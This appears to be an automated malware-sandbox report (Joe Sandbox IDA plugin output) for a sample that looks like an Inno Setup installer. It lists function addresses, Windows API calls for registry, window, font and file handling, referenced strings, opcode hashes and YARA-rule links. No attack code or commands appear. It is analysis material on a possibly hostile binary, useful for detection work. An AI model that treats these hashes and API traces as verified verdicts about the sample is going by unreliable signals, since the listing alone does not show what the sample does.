Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: AddressErrorInitializeLibraryLoadModeProc
String ID: SHCreateItemFromParsingName$shell32.dll
API String ID: 2906209438-2320870614
Opcode ID: 5f0321f70bc8b65a0e9df3b83bb4349998e588e00924faa4de34c024f66de19b
Instruction ID: 517aaa95fd919f42fec07b3e20ba2fe3b86c01757d5d2d7eeafb2f6c84d6a724
Opcode Fuzzy Hash: 5f0321f70bc8b65a0e9df3b83bb4349998e588e00924faa4de34c024f66de19b
Instruction Fuzzy Hash: 4CC040D074455095CA0077FB540374F14149750717F5180BFB848675C7DF3D440D566E

Function 0046BE24 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0042E2BC: SetErrorMode.KERNEL32(00008000), ref: 0042E2C6
Part of subcall function 0042E2BC: LoadLibraryA.KERNEL32(00000000,00000000,0042E310,?,00000000,0042E32E,?,00008000), ref: 0042E2F5

GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046BE39

Strings

shell32.dll, xrefs: 0046BE2E
SHPathPrepareForWriteA, xrefs: 0046BE24

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: AddressErrorLibraryLoadModeProc
String ID: SHPathPrepareForWriteA$shell32.dll
API String ID: 2492108670-2683653824
Opcode ID: b0d4ed7fe2e6c92240e78bd32e692da4caac8c34d98bb73dc912627f5a414994
Instruction ID: f15142af1028fbda52646c9d138091dcd6bfc2c127db856ea005f68399f83491
Opcode Fuzzy Hash: b0d4ed7fe2e6c92240e78bd32e692da4caac8c34d98bb73dc912627f5a414994
Instruction Fuzzy Hash: 76B092A0B00780C6CE00BBB3A8127871528D740704B10C07F7240EA696FF7E8C458FEE

Function 00480230 Relevance: 4.6, APIs: 3, Instructions: 98windowCOMMON

Download Yara Rule

APIs

GetSystemMenu.USER32(00000000,00000000,00000000,00480368), ref: 00480300
AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 00480311
AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00480329

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Menu$Append$System
String ID:
API String ID: 1489644407-0
Opcode ID: 07804b108b7a0fe67ba00d28aa87a6db0bb0739bb6f9f414250e392156e0bb43
Instruction ID: 04a05a6f5988e1ad1c69e12ed442e821a58669dfeb252773ef60a283987a992a
Opcode Fuzzy Hash: 07804b108b7a0fe67ba00d28aa87a6db0bb0739bb6f9f414250e392156e0bb43
Instruction Fuzzy Hash: 3431B0707043441BD721FB769C8AB9E3A949B1531CF5408BBF800AA3D3CABC9C09879D

Function 0044ABE0 Relevance: 4.6, APIs: 3, Instructions: 74COMMON

Download Yara Rule

APIs

73E9A570.USER32(00000000,?,00000000,00000000,0044ACE1,?,00480B97,?,?), ref: 0044AC55
SelectObject.GDI32(?,00000000), ref: 0044AC78
73E9A480.USER32(00000000,?,0044ACB8,00000000,0044ACB1,?,00000000,?,00000000,00000000,0044ACE1,?,00480B97,?,?), ref: 0044ACAB

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: A480A570ObjectSelect
String ID:
API String ID: 1230475511-0
Opcode ID: ce16d757fc6e84d8b50fecd4ea510c6835f5a6497dcb8cdd06a43cc5d170f4e8
Instruction ID: 3b5f26ead791ea6387a249f2cdaddc54e41ca9264cf2fbaff888b01415335cc3
Opcode Fuzzy Hash: ce16d757fc6e84d8b50fecd4ea510c6835f5a6497dcb8cdd06a43cc5d170f4e8
Instruction Fuzzy Hash: CA21B670E44248AFEB01DFA5C885B9F7BB9EB48304F41807AF500E7281D77C9950CB6A

Function 0044A914 Relevance: 4.6, APIs: 3, Instructions: 72COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0044A9A0,?,00480B97,?,?), ref: 0044A972
DrawTextW.USER32(?,?,00000000,?,?), ref: 0044A985
DrawTextA.USER32(?,00000000,00000000,?,?), ref: 0044A9B9

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: DrawText$ByteCharMultiWide
String ID:
API String ID: 65125430-0
Opcode ID: ba67a2f4d1841ae75712bddd7de105be3c5bdedf26297cf57516476b8703cb91
Instruction ID: 8b0288b9d3461177b0e2011e4a6e3c0ecae8d00baf86e8e824f1a66b6306016d
Opcode Fuzzy Hash: ba67a2f4d1841ae75712bddd7de105be3c5bdedf26297cf57516476b8703cb91
Instruction Fuzzy Hash: 0E11B6B27446047FEB10DAAA9C82E6FB7ECEB49724F10417BF504E7290D6389E018669

Function 0042440C Relevance: 4.6, APIs: 3, Instructions: 59windowCOMMON

Download Yara Rule

APIs

PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00424422
TranslateMessage.USER32(?), ref: 0042449F
DispatchMessageA.USER32(?), ref: 004244A9

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Message$DispatchPeekTranslate
String ID:
API String ID: 4217535847-0
Opcode ID: 57886541ca2a25700c9c74098ac3e1b954634baf7139c1061c5cdbc3fad4e66a
Instruction ID: 520fb342982be2dd3794930026bb259c1cd38a4fe19eb968f01b3c53081bdda3
Opcode Fuzzy Hash: 57886541ca2a25700c9c74098ac3e1b954634baf7139c1061c5cdbc3fad4e66a
Instruction Fuzzy Hash: 781191307043205AEE20FA64AD41B9B73D4DFD1708F80481EF9D997382D77D9E49879A

Function 00416654 Relevance: 4.5, APIs: 3, Instructions: 39COMMON

Download Yara Rule

APIs

SetPropA.USER32(00000000,00000000), ref: 0041667A
SetPropA.USER32(00000000,00000000), ref: 0041668F
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,00000000,00000000,?,00000000,00000000), ref: 004166B6

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Prop$Window
String ID:
API String ID: 3363284559-0
Opcode ID: 51d1e881393928d894513cc5a6715d0f9133524890ebfc277249263b82eead75
Instruction ID: 52b24e3238e4314aade48f96f4600562d70e15a3c995b5dbeb32d15e299d8853
Opcode Fuzzy Hash: 51d1e881393928d894513cc5a6715d0f9133524890ebfc277249263b82eead75
Instruction Fuzzy Hash: 4CF0BD71701220ABEB10AB598C85FA632DCAB09715F16017ABE09EF286C678DC50C7A8

Function 0041EE64 Relevance: 4.5, APIs: 3, Instructions: 27windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0041EE74
IsWindowEnabled.USER32(?), ref: 0041EE7E
EnableWindow.USER32(?,00000000), ref: 0041EEA4

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Window$EnableEnabledVisible
String ID:
API String ID: 3234591441-0
Opcode ID: 5cbd57f62825f5fd03c8e352543d82b631dfda465d6e8043ea84f90506a45dcf
Instruction ID: 4e94e345e4a8e87798afb8fb42df504bf5387c41ee1a2ac16dc0d48b177cce37
Opcode Fuzzy Hash: 5cbd57f62825f5fd03c8e352543d82b631dfda465d6e8043ea84f90506a45dcf
Instruction Fuzzy Hash: 4DE0EDB8100304AAE750AB2BEC81A57769CBB55314F49843BAC099B293DA3ED8449A78

Function 00480B7C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

SetActiveWindow.USER32(?), ref: 00480C2A

Strings

InitializeWizard, xrefs: 00480BC3

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: ActiveWindow
String ID: InitializeWizard
API String ID: 2558294473-2356795471
Opcode ID: 723738b8fbe3fabf7eb5c80f16a5b290c90bba58ac79f9736125b6795bdc7b1c
Instruction ID: 7183a9f40d151cc4564f9c637f0f3a65215fdab84d47651bf6ef09736f3ca39c
Opcode Fuzzy Hash: 723738b8fbe3fabf7eb5c80f16a5b290c90bba58ac79f9736125b6795bdc7b1c
Instruction Fuzzy Hash: C511C1302142049FD754EB6AFD82B0A7BA8E716728F10447BE810C77A1EB79AC64C79D

Function 0047AFDC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60

RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,?,?,0047B222,00000000,0047B35C), ref: 0047B021

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 0047AFF1

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: CloseOpen
String ID: Software\Microsoft\Windows\CurrentVersion
API String ID: 47109696-1019749484
Opcode ID: 3b78e152b17f15840806b4e47da0d6875f627c855d5fc6915719fd9d10737491
Instruction ID: 32b1a4b4f3febb624688285ac2ab15cdeec5a734a0466c395ac52858640c886b
Opcode Fuzzy Hash: 3b78e152b17f15840806b4e47da0d6875f627c855d5fc6915719fd9d10737491
Instruction Fuzzy Hash: 7CF0E93170021467D700A55A6D02BAF528DCB80358F20407FF508EB342DABA9D06039C

Function 0046DE6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34registryCOMMON

Download Yara Rule

APIs

RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,?,00474FCB,0049B178,?,0046E183,?,00000000,0046E6DA,?,_is1), ref: 0046DE8F

Strings

Inno Setup: Setup Version, xrefs: 0046DE8D

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Value
String ID: Inno Setup: Setup Version
API String ID: 3702945584-4166306022
Opcode ID: 308a2d795db4d9f089db4d3a0d80863649b6fa39a5e40ce591918164ebf00fab
Instruction ID: 3f565b73c41be68d18d1c675279a4c2ca8d62721aeaae2bfa6e8ff1167108c85
Opcode Fuzzy Hash: 308a2d795db4d9f089db4d3a0d80863649b6fa39a5e40ce591918164ebf00fab
Instruction Fuzzy Hash: 6AE06D717016043FD710AA2BDC85F6BBADCDF983A5F10403AB908EB392D578DD0081A8

Function 0046DEDC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24registryCOMMON

Download Yara Rule

APIs

RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046E544,?,?,00000000,0046E6DA,?,_is1,?), ref: 0046DEEF

Strings

NoModify, xrefs: 0046DEED

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Value
String ID: NoModify
API String ID: 3702945584-1699962838
Opcode ID: fcf48f294370718ea72f2974fc8c507718464dc9ad4e6ec171c14c9c323779b1
Instruction ID: 16e32e904041cf2989cb5be4c2021f94977a521c7974260517dd4293f9cbe128
Opcode Fuzzy Hash: fcf48f294370718ea72f2974fc8c507718464dc9ad4e6ec171c14c9c323779b1
Instruction Fuzzy Hash: 64E04FB0A04304BFEB04EB55CD4AF6F77ACDB48754F104059BA089B291E674EE00C668

Function 0042DD44 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60

Strings

System\CurrentControlSet\Control\Windows, xrefs: 0042DD5E

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Open
String ID: System\CurrentControlSet\Control\Windows
API String ID: 71445658-1109719901
Opcode ID: 11c611a566f6cd60f6ca4cad85dc4867506d66b11241b25e540668e5f726788d
Instruction ID: aea9d63627e202933d8ac4c6cad7c964b34c473e1f77024d29d81bfc1069fbec
Opcode Fuzzy Hash: 11c611a566f6cd60f6ca4cad85dc4867506d66b11241b25e540668e5f726788d
Instruction Fuzzy Hash: 6FD09E72920128BB9B009A89DC41DF7775DDB19760F44401AF90497141C1B4AC5197E4

Function 0045363C Relevance: 3.2, APIs: 2, Instructions: 190fileCOMMON

Download Yara Rule

APIs

FindNextFileA.KERNEL32(000000FF,?,00000000,0045386F,?,00000000,004538D9,?,?,-00000001,00000000,?,0047B861,00000000,0047B7B0,00000000), ref: 0045384B
FindClose.KERNEL32(000000FF,00453876,0045386F,?,00000000,004538D9,?,?,-00000001,00000000,?,0047B861,00000000,0047B7B0,00000000,00000001), ref: 00453869

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Find$CloseFileNext
String ID:
API String ID: 2066263336-0
Opcode ID: ce33a9adc91091840db89c3f0b9d0ab62a3048a172c241aa17054621e5542f77
Instruction ID: 9ec0e3c397c6f5708f2a232916c112a37fe27e538a562d44e8698fe4f4711445
Opcode Fuzzy Hash: ce33a9adc91091840db89c3f0b9d0ab62a3048a172c241aa17054621e5542f77
Instruction Fuzzy Hash: AA81B37090424D9FCF11EF65C8417EFBBB4AF4934AF1480AAE84067392D3399B4ACB58

Function 0047C9AC Relevance: 3.2, APIs: 2, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetACP.KERNEL32(?,?,00000001,00000000,0047CC8B,?,-0000001A,0047EBEA,-00000010,?,00000004,0000001A,00000000,0047EF37,?,0045D288), ref: 0047CA22

Part of subcall function 0042E244: 73E9A570.USER32(00000000,00000000,0047EF9E,?,?,00000001,00000000,00000002,00000000,0047F8E7,?,?,?,?,?,0049719A), ref: 0042E253
Part of subcall function 0042E244: EnumFontsA.GDI32(?,00000000,0042E230,00000000,00000000,0042E29C,?,00000000,00000000,0047EF9E,?,?,00000001,00000000,00000002,00000000), ref: 0042E27E
Part of subcall function 0042E244: 73E9A480.USER32(00000000,?,0042E2A3,00000000,00000000,0042E29C,?,00000000,00000000,0047EF9E,?,?,00000001,00000000,00000002,00000000), ref: 0042E296

SendNotifyMessageA.USER32(000103C0,00000496,00002711,-00000001), ref: 0047CBF2

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: A480A570EnumFontsMessageNotifySend
String ID:
API String ID: 2685184028-0
Opcode ID: f68c4743a9de9405453e6a0390fbdfcde8eff5ac8737c06096cd16648cf5d8d5
Instruction ID: fce8b5d73ed99f1e2ef66d4a8ce886950ac346dadb3b378a3b6f7676f451f25a
Opcode Fuzzy Hash: f68c4743a9de9405453e6a0390fbdfcde8eff5ac8737c06096cd16648cf5d8d5
Instruction Fuzzy Hash: 585172346001048BC720EF26E9C668B3799EB54309B50C57FB8489B7A7C73CED468B9E

Function 0042DB28 Relevance: 3.1, APIs: 2, Instructions: 113registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,0042DC60), ref: 0042DB64
RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,70000000,?,?,00000000,?,00000000,?,00000000,0042DC60), ref: 0042DBD4

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: f6dee5a1b0912d590274e0c641160928bd3a3525fab59aba2a017e3bac49ea5e
Instruction ID: dfb8c8f379aef3e71039058fa16673b54f7d2a66c5b8750361213b9ce9dda202
Opcode Fuzzy Hash: f6dee5a1b0912d590274e0c641160928bd3a3525fab59aba2a017e3bac49ea5e
Instruction Fuzzy Hash: E6416371E04129AFDB11DF96D881BAFB7B8EB44704F91846AE800F7244D778EE00DB95

Function 0042DDE8 Relevance: 3.1, APIs: 2, Instructions: 111registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,0042DEFE,?,?,00000008,00000000,00000000,0042DF2B), ref: 0042DE94
RegCloseKey.ADVAPI32(?,0042DF05,?,00000000,00000000,00000000,00000000,00000000,0042DEFE,?,?,00000008,00000000,00000000,0042DF2B), ref: 0042DEF8

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: CloseEnum
String ID:
API String ID: 2818636725-0
Opcode ID: c20ec2cbd5f7473bb618f7593d98c9f52b2147fe6f3bae42fe9bdb37577d9e65
Instruction ID: 371203d48d58dd12687a59eda9429109c9bfccb849147f5bab4b3e409d052118
Opcode Fuzzy Hash: c20ec2cbd5f7473bb618f7593d98c9f52b2147fe6f3bae42fe9bdb37577d9e65
Instruction Fuzzy Hash: F431D570F04648AEDB11DFA6DD42BBFBBB8EB49304F91407BE500B7280D6789E01CA19

Function 00493EE4 Relevance: 3.1, APIs: 2, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 00493968: 73E9A570.USER32(00000000,?,?,00000000), ref: 00493979
Part of subcall function 00493968: SelectObject.GDI32(00000000,00000000), ref: 0049399B
Part of subcall function 00493968: GetTextExtentPointA.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,00493F19), ref: 004939AF
Part of subcall function 00493968: GetTextMetricsA.GDI32(00000000,?), ref: 004939D1
Part of subcall function 00493968: 73E9A480.USER32(00000000,00000000,004939FB,004939F4,?,00000000,?,?,00000000), ref: 004939EE

MulDiv.KERNEL32(?,?,00000006), ref: 00493F5B
MulDiv.KERNEL32(?,?,0000000D), ref: 00493F70

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Text$A480A570ExtentMetricsObjectPointSelect
String ID:
API String ID: 2611416588-0
Opcode ID: c7feb504d2d372dd7a936f3e8cfb502d4e77e245cf5933d87b22aedb786a6721
Instruction ID: 2c5779c8db7604dd322bbbcab9d0a02255b69d6d228b57f271ef2b97528d9bc5
Opcode Fuzzy Hash: c7feb504d2d372dd7a936f3e8cfb502d4e77e245cf5933d87b22aedb786a6721
Instruction Fuzzy Hash: B321F4713002009FDB40DF68C8C5AA637A9EB8A714F1442B9FD188F38ADB25EC048BA5

